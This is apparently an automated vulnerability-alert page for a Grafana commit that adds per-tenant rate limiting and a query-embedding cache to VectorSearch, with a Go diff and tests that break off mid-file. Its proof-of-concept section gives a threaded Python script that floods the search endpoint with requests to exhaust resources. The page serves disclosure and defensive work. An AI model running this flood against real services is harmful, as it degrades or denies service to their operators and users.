Denial of Service (resource exhaustion) / Rate limiting abuse

MEDIUM
grafana/grafana
Commit: 98d5c8f44864
Affected: Versions prior to 12.4.0 (e.g., 12.3.x and earlier)
2026-05-26 09:52 UTC

Description

The commit introduces a per-tenant VectorSearch query embedding cache (FIFO eviction) and a per-tenant rate limiter (tumbling-window) to mitigate resource-exhaustion and DoS scenarios arising from abusive or heavy usage of VectorSearch. It also adds fail-closed behavior if the rate limiter is unavailable, and exposes new configuration knobs to enable/disable the features and tune caps (cache max per tenant, rate limit per tenant, and rate limit window). In short, this is a genuine security-related hardening aimed at preventing DoS via abuse of the VectorSearch backend.

Proof of Concept

PoC (actionable steps to demonstrate pre-fix DoS risk): Prerequisites: - Grafana instance prior to 12.4.0 (vulnerable to unbounded VectorSearch load without tenant rate limiting). - VectorSearch enabled and accessible via the Grafana HTTP API (adjust endpoint to your deployment). - A tenant/namespace identifier used by VectorSearch requests. - Authentication token or method as required by your Grafana deployment. Attack concept: - Flood the VectorSearch endpoint with rapid, repeated requests for the same tenant to trigger the lack of per-tenant rate limiting and/or caching behavior, causing high CPU/DB load and latency. In the vulnerable versions, requests would not be rate-limited per-tenant, leading to potential DoS or degraded service. After the fix, the same flood would be throttled by a 60 requests/min per-tenant window and/or cache limits, and some requests may be rejected with a rate-limited error. Example PoC (Python; adapt endpoint path and payload to your environment): import threading, requests, time ENDPOINT = "http://localhost:3000/api/vector_search" # adjust to actual endpoint HEADERS = {"Authorization": "Bearer <TOKEN>"} NS = "tenant1" MODEL = "default" QUERY = "some query text that exercises embedding path" LIMIT = 5 def do_request(): payload = { "namespace": NS, "model": MODEL, "query": QUERY, "limit": LIMIT } try: r = requests.post(ENDPOINT, json=payload, timeout=5, headers=HEADERS) print(f"{r.status_code} {r.text[:80]}") except Exception as e: print("ERR:", e) def flood(rate_per_sec, duration_sec): end = time.time() + duration_sec while time.time() < end: threads = [threading.Thread(target=do_request) for _ in range(rate_per_sec)] for t in threads: t.start() for t in threads: t.join() if __name__ == "__main__": # Example: 50 requests/sec for 60 seconds flood(50, 60) Notes: - The exact endpoint, payload shape, and auth method must be aligned with your Grafana deployment. - In a properly configured environment, pre-fix runs should not be rate-limited per-tenant, so a flood could exhaust resources. The post-fix version should throttle accordingly and return rate-limit errors after reaching the threshold. - Do not run this against production systems without proper authorization and change controls.

Commit Details

Author: Rafael Bortolon Paulovic

Date: 2026-05-26 08:03 UTC

Message:

Unified Storage: VectorSearch query-embedding cache and per-tenant rate limit (#125284) * Unified Storage: Add VectorSearch query cache + per-tenant rate limit Adds a pgvector-backed query embedding cache (FIFO eviction by created_at) and a DB-backed per-tenant tumbling-window rate limiter for VectorSearch. Both are always on when the backend supports them; limits are fixed in code (1000 entries/tenant; 60 requests/min/tenant). Includes background sweeper for rate-bucket housekeeping and Prometheus counters that avoid unbounded namespace cardinality. * Unified Storage: Simplify VectorSearch query cache and metrics Refinements on top of the initial implementation: - Switch cache eviction from LRU to FIFO by created_at — keeps Get as a pure SELECT so hot rows don't contend on per-hit UPDATEs. - Drop the stored query_text column; only (namespace, model, hash) -> embedding is needed. - Rename EvictLRU -> EvictOldest to match the new policy. - Trim implementation details from QueryEmbeddingCache / RateLimiter interface docs; document the contract instead. - Collapse per-namespace cache metric labels to per-model where cardinality matters, and split rate-limit metrics into "rejected" vs "limiter errors" so fail-closed and over-quota stay distinguishable. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * Unified Storage: Tidy VectorSearch handler and rate-bucket schema - Extract rate-limit check and query-embed/cache flow into helper methods so VectorSearch sits comfortably under the gocyclo limit. - Switch sweeper goroutine to sync.WaitGroup.Go (Go 1.25). - Define vector_search_rate_buckets via migrator.Table now that no pgvector-specific column types are involved; the cache table stays raw SQL for halfvec(1024). - Drop a misleading comment about non-pgvector backends in withSearch. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * Unified Storage: Address VectorSearch cache + rate-limit review - Make cache cap, rate limit threshold and rate limit window configurable via [database_vector] (defaults: enabled, 1000, 60, 1m). Both can be disabled independently via *_enabled = false. - Evict the query cache down to 80% of the per-tenant cap in one pass instead of trimming one row per miss, so we don't DELETE on every cache miss at steady state. - Add a standalone window_start index on vector_search_rate_buckets so the periodic sweep can use it (composite PK leads with namespace and can't satisfy a window_start-only predicate). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Triage Assessment

Vulnerability Type: Denial of Service (resource exhaustion) / rate-limiting related protections

Confidence: MEDIUM

Reasoning:

The commit introduces per-tenant rate limiting and a query-embedding cache for VectorSearch, with a fail-closed behavior if the rate limiter is unavailable. These changes mitigate potential abuse leading to resource exhaustion (DoS) and unintended information exposure via heavy usage, which are security-related concerns. Although not a classic vulnerability like XSS or SQLi, it addresses security risk from abuse and latency/resource consumption.

Verification Assessment

Vulnerability Type: Denial of Service (resource exhaustion) / Rate limiting abuse

Confidence: MEDIUM

Affected Versions: Versions prior to 12.4.0 (e.g., 12.3.x and earlier)

Code Diff

diff --git a/pkg/setting/setting.go b/pkg/setting/setting.go index 4d86232ed7907..113e360e459bf 100644 --- a/pkg/setting/setting.go +++ b/pkg/setting/setting.go @@ -713,6 +713,15 @@ type Cfg struct { VectorPromotionThreshold int // row count per tenant to trigger promotion VectorPromoterInterval time.Duration // promoter tick interval; 0 disables + // VectorSearch per-tenant query-embedding cache (DB-backed, FIFO). + VectorQueryCacheEnabled bool + VectorQueryCacheMaxPerTenant int + + // VectorSearch per-tenant rate limit (DB-backed, sliding window). + VectorRateLimitEnabled bool + VectorRateLimitPerTenant int + VectorRateLimitWindow time.Duration + // Embedding provider used by the VectorSearch RPC. "" = disabled. EmbeddingProvider string // "vertex" | "bedrock" | "" VertexProjectID string diff --git a/pkg/setting/setting_unified_storage.go b/pkg/setting/setting_unified_storage.go index 44aa54b7c52fc..7f131c30a43fc 100644 --- a/pkg/setting/setting_unified_storage.go +++ b/pkg/setting/setting_unified_storage.go @@ -284,6 +284,13 @@ func (cfg *Cfg) setUnifiedStorageConfig() { cfg.VectorPromotionThreshold = vectorSection.Key("promotion_threshold").MustInt(10000) cfg.VectorPromoterInterval = vectorSection.Key("promoter_interval").MustDuration(0) // zero means disabled + // Per-tenant query-embedding cache + rate limit. + cfg.VectorQueryCacheEnabled = vectorSection.Key("query_cache_enabled").MustBool(true) + cfg.VectorQueryCacheMaxPerTenant = vectorSection.Key("query_cache_max_per_tenant").MustInt(1000) + cfg.VectorRateLimitEnabled = vectorSection.Key("rate_limit_enabled").MustBool(true) + cfg.VectorRateLimitPerTenant = vectorSection.Key("rate_limit_per_tenant").MustInt(60) + cfg.VectorRateLimitWindow = vectorSection.Key("rate_limit_window").MustDuration(time.Minute) + // Embedding provider for the VectorSearch RPC. Empty = disabled (RPC // returns Unimplemented). When set, the matching provider's connection // fields must also be configured. diff --git a/pkg/storage/unified/resource/search.go b/pkg/storage/unified/resource/search.go index 948f7e0cf6a3d..60433bbc24e04 100644 --- a/pkg/storage/unified/resource/search.go +++ b/pkg/storage/unified/resource/search.go @@ -3,6 +3,8 @@ package resource import ( "cmp" "context" + "crypto/sha256" + "encoding/hex" "fmt" "hash/fnv" "math/rand" @@ -170,6 +172,12 @@ type searchServer struct { initWorkers int initMinSize int + queryCache vector.QueryEmbeddingCache + queryCacheMaxPerTenant int + rateLimiter vector.RateLimiter + rateLimitPerTenant int + rateLimitWindow time.Duration + ownsIndexFn func(key NamespacedResource) (bool, error) buildIndex singleflight.Group @@ -270,6 +278,12 @@ func newSearchServer(opts SearchOptions, storage StorageBackend, vectorBackend v selectableFields: opts.SelectableFieldsForKinds, injectFailuresPercent: opts.InjectFailuresPercent, indexModificationCacheTTL: opts.IndexModificationCacheTTL, + + queryCache: opts.QueryCache, + queryCacheMaxPerTenant: opts.QueryCacheMaxPerTenant, + rateLimiter: opts.RateLimiter, + rateLimitPerTenant: opts.RateLimitPerTenant, + rateLimitWindow: opts.RateLimitWindow, } s.rebuildQueue = debouncer.NewQueue(combineRebuildRequests) @@ -602,26 +616,18 @@ func (s *searchServer) VectorSearch(ctx context.Context, req *resourcepb.VectorS attribute.Int("limit", limit), ) - // Embed the query as a retrieval *query* (different task hint than the - // retrieval *document* hint used at index time — providers tune - // projections per side of the retrieval pair). - out, err := s.embedder.EmbedText(ctx, embedder.EmbedTextInput{ - Texts: []string{req.Query}, - Normalize: s.embedder.ShouldNormalize(), - Task: embedder.TaskRetrievalQuery, - }) - if err != nil { - s.log.Error("vector search: embed query", "err", err) - return nil, status.Error(codes.Internal, "embed query") + if err := s.checkVectorSearchRateLimit(ctx, req.Key.Namespace); err != nil { + return nil, err } - if len(out.Embeddings) != 1 || len(out.Embeddings[0].Dense) == 0 { - s.log.Error("vector search: embedder returned no vectors") - return nil, status.Error(codes.Internal, "embed query: empty result") + + dense, err := s.embedVectorSearchQuery(ctx, req.Key.Namespace, req.Query) + if err != nil { + return nil, err } results, err := s.vectorBackend.Search(ctx, req.Key.Namespace, s.embedder.Model, req.Key.Resource, - out.Embeddings[0].Dense, limit, translateVectorSearchFilters(req.Filters)...) + dense, limit, translateVectorSearchFilters(req.Filters)...) if err != nil { s.log.Error("vector search: backend", "err", err) return nil, status.Error(codes.Internal, "vector search backend") @@ -685,6 +691,109 @@ func validateVectorSearchRequest(req *resourcepb.VectorSearchRequest) *resourcep return nil } +// checkVectorSearchRateLimit returns a gRPC status error when the +// request must be rejected (over quota or limiter unreachable), nil +// when it should proceed. +func (s *searchServer) checkVectorSearchRateLimit(ctx context.Context, namespace string) error { + if s.rateLimiter == nil { + return nil + } + allowed, count, err := s.rateLimiter.Allow(ctx, namespace, s.rateLimitWindow, s.rateLimitPerTenant) + if err != nil { + s.log.Error("vector search: rate-limit check failed, fail-closed", "err", err, "namespace", namespace) + if s.vectorMetrics != nil { + s.vectorMetrics.RateLimiterErrorsTotal.Inc() + } + return status.Error(codes.Unavailable, "rate limiter unavailable") + } + if !allowed { + if s.vectorMetrics != nil { + s.vectorMetrics.RateLimitedRequestsTotal.Inc() + } + return status.Errorf(codes.ResourceExhausted, "tenant rate limit exceeded: %d requests in window", count) + } + return nil +} + +// embedVectorSearchQuery returns the query embedding, fetching it from +// the cache on hit or calling the embedder on miss (and best-effort +// writing back into the cache, enforcing the per-tenant cap). +func (s *searchServer) embedVectorSearchQuery(ctx context.Context, namespace, query string) ([]float32, error) { + queryHash := sha256Hex(query) + if dense, ok := s.lookupCachedQueryEmbedding(ctx, namespace, queryHash); ok { + return dense, nil + } + + // Embed the query as a retrieval *query* (different task hint than + // the retrieval *document* hint used at index time — providers tune + // projections per side of the retrieval pair). + out, err := s.embedder.EmbedText(ctx, embedder.EmbedTextInput{ + Texts: []string{query}, + Normalize: s.embedder.ShouldNormalize(), + Task: embedder.TaskRetrievalQuery, + }) + if err != nil { + s.log.Error("vector search: embed query", "err", err) + return nil, status.Error(codes.Internal, "embed query") + } + if len(out.Embeddings) != 1 || len(out.Embeddings[0].Dense) == 0 { + s.log.Error("vector search: embedder returned no vectors") + return nil, status.Error(codes.Internal, "embed query: empty result") + } + dense := out.Embeddings[0].Dense + if s.vectorMetrics != nil { + s.vectorMetrics.QueryCacheMissesTotal.WithLabelValues(s.embedder.Model).Inc() + } + s.storeCachedQueryEmbedding(ctx, namespace, queryHash, dense) + return dense, nil +} + +// lookupCachedQueryEmbedding returns (embedding, true) on hit; (nil, +// false) on miss or any error (cache failures must not fail the search). +func (s *searchServer) lookupCachedQueryEmbedding(ctx context.Context, namespace, queryHash string) ([]float32, bool) { + if s.queryCache == nil { + return nil, false + } + emb, hit, err := s.queryCache.Get(ctx, namespace, s.embedder.Model, queryHash) + if err != nil { + s.log.Warn("vector search: cache lookup failed, falling through", "err", err) + return nil, false + } + if !hit { + return nil, false + } + if s.vectorMetrics != nil { + s.vectorMetrics.QueryCacheHitsTotal.WithLabelValues(s.embedder.Model).Inc() + } + return emb, true +} + +// vectorQueryCacheEvictTargetFraction is how full the cache is left +// after an eviction round runs. +const vectorQueryCacheEvictTargetFraction = 0.8 + +// storeCachedQueryEmbedding writes the freshly-embedded vector into the +// cache (best-effort). When the tenant is at or above the cap, eviction +// trims down to vectorQueryCacheEvictTargetFraction of the cap in one +// pass so we don't run a DELETE on every cache miss at steady state. +func (s *searchServer) storeCachedQueryEmbedding(ctx context.Context, namespace, queryHash string, dense []float32) { + if s.queryCache == nil || s.queryCacheMaxPerTenant <= 0 { + return + } + if n, err := s.queryCache.Count(ctx, namespace); err == nil && int(n) >= s.queryCacheMaxPerTenant { + target := int(float64(s.queryCacheMaxPerTenant) * vectorQueryCacheEvictTargetFraction) + evictN := int(n) - target + if deleted, err := s.queryCache.EvictOldest(ctx, namespace, evictN); err != nil { + s.log.Warn("vector search: cache evict failed", "err", err) + } else if deleted > 0 && s.vectorMetrics != nil { + s.vectorMetrics.QueryCacheEvictionsTotal.Add(float64(deleted)) + } + } + if err := s.queryCache.Put(ctx, namespace, s.embedder.Model, queryHash, dense); err != nil { + s.log.Warn("vector search: cache put failed", "err", err) + } +} + // vectorAuthzKey de-dupes (UID, Folder) so sub-resources of the same // parent (e.g. dashboard panels) share a single batch-check entry. type vectorAuthzKey struct{ uid, folder string } @@ -1028,6 +1137,8 @@ func (s *searchServer) init(ctx context.Context) error { s.bgTaskWg.Add(1) go s.runPeriodicScanForIndexesToRebuild(subctx) + s.startRateBucketSweeper(subctx) + end := time.Now().Unix() s.log.Info("search index initialized", "duration_secs", end-start, "total_docs", s.search.TotalDocs()) return nil @@ -1080,6 +1191,42 @@ func (s *searchServer) runPeriodicScanForIndexesToRebuild(ctx context.Context) { } } +func sha256Hex(s string) string { + h := sha256.Sum256([]byte(s)) + return hex.EncodeToString(h[:]) +} + +// Old buckets never affect Allow() — sweeping is purely housekeeping. +func (s *searchServer) startRateBucketSweeper(ctx context.Context) { + if s.rateLimiter == nil || s.rateLimitWindow <= 0 { + return + } + s.bgTaskWg.Go(func() { + interval := s.rateLimitWindow / 2 + if interval < time.Minute { + interval = time.Minute + } + t := time.NewTicker(interval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-t.C: + cutoff := time.Now().Add(-2 * s.rateLimitWindow) + deleted, err := s.rateLimiter.SweepOlderThan(ctx, cutoff) + if err != nil { + s.log.Warn("rate-bucket sweep failed", "err", err) + continue + } + if deleted > 0 { + s.log.Debug("rate-bucket sweep", "deleted", deleted, "cutoff", cutoff) + } + } + } + }) +} + // jitterForKey returns a deterministic jitter duration for the given key, // bounded to [0, maxAge/2). This spreads index rebuilds across scan intervals // to avoid thundering herd CPU spikes when many indexes become stale at once. diff --git a/pkg/storage/unified/resource/search_vector_cache_test.go b/pkg/storage/unified/resource/search_vector_cache_test.go new file mode 100644 index 0000000000000..abcf4ea7b8f9c --- /dev/null +++ b/pkg/storage/unified/resource/search_vector_cache_test.go @@ -0,0 +1,233 @@ +package resource + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" + + "github.com/grafana/grafana/pkg/storage/unified/resourcepb" + "github.com/grafana/grafana/pkg/storage/unified/search/embed/embedder" + "github.com/grafana/grafana/pkg/storage/unified/search/vector" +) + +type fakeQueryCache struct { + mu sync.Mutex + entries map[string][]float32 + getCalls int + putCalls int + evicted int64 + putErr error + getErr error +} + +func newFakeQueryCache() *fakeQueryCache { + return &fakeQueryCache{entries: map[string][]float32{}} +} + +func cacheKey(ns, model, hash string) string { return ns + "|" + model + "|" + hash } + +func (f *fakeQueryCache) Get(_ context.Context, ns, model, hash string) ([]float32, bool, error) { + f.mu.Lock() + defer f.mu.Unlock() + f.getCalls++ + if f.getErr != nil { + return nil, false, f.getErr + } + if v, ok := f.entries[cacheKey(ns, model, hash)]; ok { + return v, true, nil + } + return nil, false, nil +} + +func (f *fakeQueryCache) Put(_ context.Context, ns, model, hash string, emb []float32) error { + f.mu.Lock() + defer f.mu.Unlock() + f.putCalls++ + if f.putErr != nil { + return f.putErr + } + f.entries[cacheKey(ns, model, hash)] = emb + return nil +} + +func (f *fakeQueryCache) Count(_ context.Context, ns string) (int64, error) { + f.mu.Lock() + defer f.mu.Unlock() + var n int64 + for k := range f.entries { + // Prefix match is safe because tests use unique namespaces. + if len(k) >= len(ns) && k[:len(ns)] == ns { + n++ + } + } + return n, nil +} + +func (f *fakeQueryCache) EvictOldest(_ context.Context, ns string, n int) (int64, error) { + f.mu.Lock() + defer f.mu.Unlock() + deleted := int64(0) + for k := range f.entries { + if deleted >= int64(n) { + break + } + if len(k) >= len(ns) && k[:len(ns)] == ns { + delete(f.entries, k) + deleted++ + } + } + f.evicted += deleted + return deleted, nil +} + +type fakeRateLimiter struct { + mu sync.Mutex + calls int + count int64 + allow bool + err error + sweeps int + swept int64 + sweepEr error +} + +func (f *fakeRateLimiter) Allow(_ context.Context, _ string, _ time.Duration, _ int) (bool, int64, error) { + f.mu.Lock() + defer f.mu.Unlock() + f.calls++ + if f.err != nil { + return false, 0, f.err + } + return f.allow, f.count, nil +} + +func (f *fakeRateLimiter) SweepOlderThan(_ context.Context, _ time.Time) (int64, error) { + f.mu.Lock() + defer f.mu.Unlock() + f.sweeps++ + return f.swept, f.sweepEr +} + +func newTestSearchServerWithCache(emb *embedder.Embedder, backend vector.VectorBackend, cache vector.QueryEmbeddingCache, rl vector.RateLimiter) *searchServer { + s := newTestSearchServer(emb, backend) + s.queryCache = cache + s.queryCacheMaxPerTenant = 1000 + s.rateLimiter = rl + s.rateLimitPerTenant = 60 + s.rateLimitWindow = time.Minute + return s +} + +func TestVectorSearch_CacheMissThenHitSkipsEmbedder(t *testing.T) { + fake := &fakeTextEmbedder{dim: 4} + emb := newTestEmbedder(fake) + backend := &fakeVectorBackend{results: []vector.VectorSearchResult{{UID: "u", Title: "t"}}} + cache := newFakeQueryCache() + s := newTestSearchServerWithCache(emb, backend, cache, nil) + + req := &resourcepb.VectorSearchRequest{Key: validKey(), Query: "same query", Limit: 5} + + _, err := s.VectorSearch(authedCtx(), req) + require.NoError(t, err) + assert.Equal(t, 1, cache.getCalls) + assert.Equal(t, 1, cache.putCalls) + assert.Equal(t, "same query", fake.gotIn.Texts[0]) + + // Reset the captur ... [truncated]
← Back to Alerts View on GitHub →